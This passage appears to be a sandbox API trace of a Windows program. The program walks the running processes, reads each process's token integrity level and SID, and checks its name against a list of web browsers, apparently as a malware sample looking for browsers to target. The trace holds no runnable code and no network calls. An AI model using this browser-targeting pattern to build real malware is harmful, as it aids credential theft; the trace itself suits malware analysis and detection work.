TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.458] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.458] GetLastError () returned 0x7a [0243.459] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.459] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.459] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.459] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0243.459] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0243.459] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0243.459] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0243.459] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0243.459] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0243.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0243.459] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.459] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.459] GetLastError () returned 0x7a [0243.459] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.459] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.459] CloseHandle (hObject=0xb8) returned 1 [0243.459] CloseHandle (hObject=0xb4) returned 1 [0243.459] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.460] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.460] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.460] GetLastError () returned 0x7a [0243.460] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.460] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.460] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.460] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0243.460] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0243.460] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0243.460] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0243.460] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0243.460] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0243.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0243.460] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.460] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.460] GetLastError () returned 0x7a [0243.460] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.460] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.461] CloseHandle (hObject=0xb8) returned 1 [0243.461] CloseHandle (hObject=0xb4) returned 1 [0243.461] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.461] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.461] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.461] GetLastError () returned 0x7a [0243.461] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.461] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.461] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.461] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.461] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0243.461] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.461] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.461] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.461] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0243.461] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.461] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.461] GetLastError () returned 0x7a [0243.462] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.462] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.462] CloseHandle (hObject=0xb8) returned 1 [0243.462] CloseHandle (hObject=0xb4) returned 1 [0243.462] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.462] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.462] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.462] GetLastError () returned 0x7a [0243.462] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.462] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.462] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.462] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0243.462] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0243.462] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0243.462] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0243.462] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0243.462] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0243.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0243.462] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.462] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.463] GetLastError () returned 0x7a [0243.463] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.463] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.463] CloseHandle (hObject=0xb8) returned 1 [0243.463] CloseHandle (hObject=0xb4) returned 1 [0243.463] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.463] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.463] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.463] GetLastError () returned 0x7a [0243.463] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.463] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.463] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.463] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.463] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0243.463] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.463] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.463] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.463] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0243.463] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.463] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.463] GetLastError () returned 0x7a [0243.464] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.464] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.464] CloseHandle (hObject=0xb8) returned 1 [0243.464] CloseHandle (hObject=0xb4) returned 1 [0243.464] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.464] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.464] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.464] GetLastError () returned 0x7a [0243.464] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.464] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.464] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.464] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.464] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0243.464] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.464] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.464] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.464] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0243.464] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.464] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.464] GetLastError () returned 0x7a [0243.464] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.465] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.465] CloseHandle (hObject=0xb8) returned 1 [0243.465] CloseHandle (hObject=0xb4) returned 1 [0243.465] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.465] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.465] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.465] GetLastError () returned 0x7a [0243.465] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.465] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.465] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.465] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.465] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.465] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.465] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.465] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.465] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0243.465] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.465] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.465] GetLastError () returned 0x7a [0243.465] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.465] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.466] CloseHandle (hObject=0xb8) returned 1 [0243.466] CloseHandle (hObject=0xb4) returned 1 [0243.466] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.466] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.466] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.466] GetLastError () returned 0x7a [0243.466] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.466] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.466] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.466] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0243.466] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0243.466] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0243.466] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0243.466] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0243.466] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0243.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0243.466] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.466] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.466] GetLastError () returned 0x7a [0243.466] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.466] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.466] CloseHandle (hObject=0xb8) returned 1 [0243.467] CloseHandle (hObject=0xb4) returned 1 [0243.467] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.467] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0243.467] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0243.467] GetLastError () returned 0x7a [0243.467] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0243.467] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0243.467] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0243.467] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0243.467] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0243.467] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0243.467] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0243.467] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0243.467] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0243.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0243.467] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0243.467] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0243.467] GetLastError () returned 0x7a [0243.467] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0243.467] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0243.467] CloseHandle (hObject=0xb8) returned 1 [0243.467] CloseHandle (hObject=0xb4) returned 1 [0243.467] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, 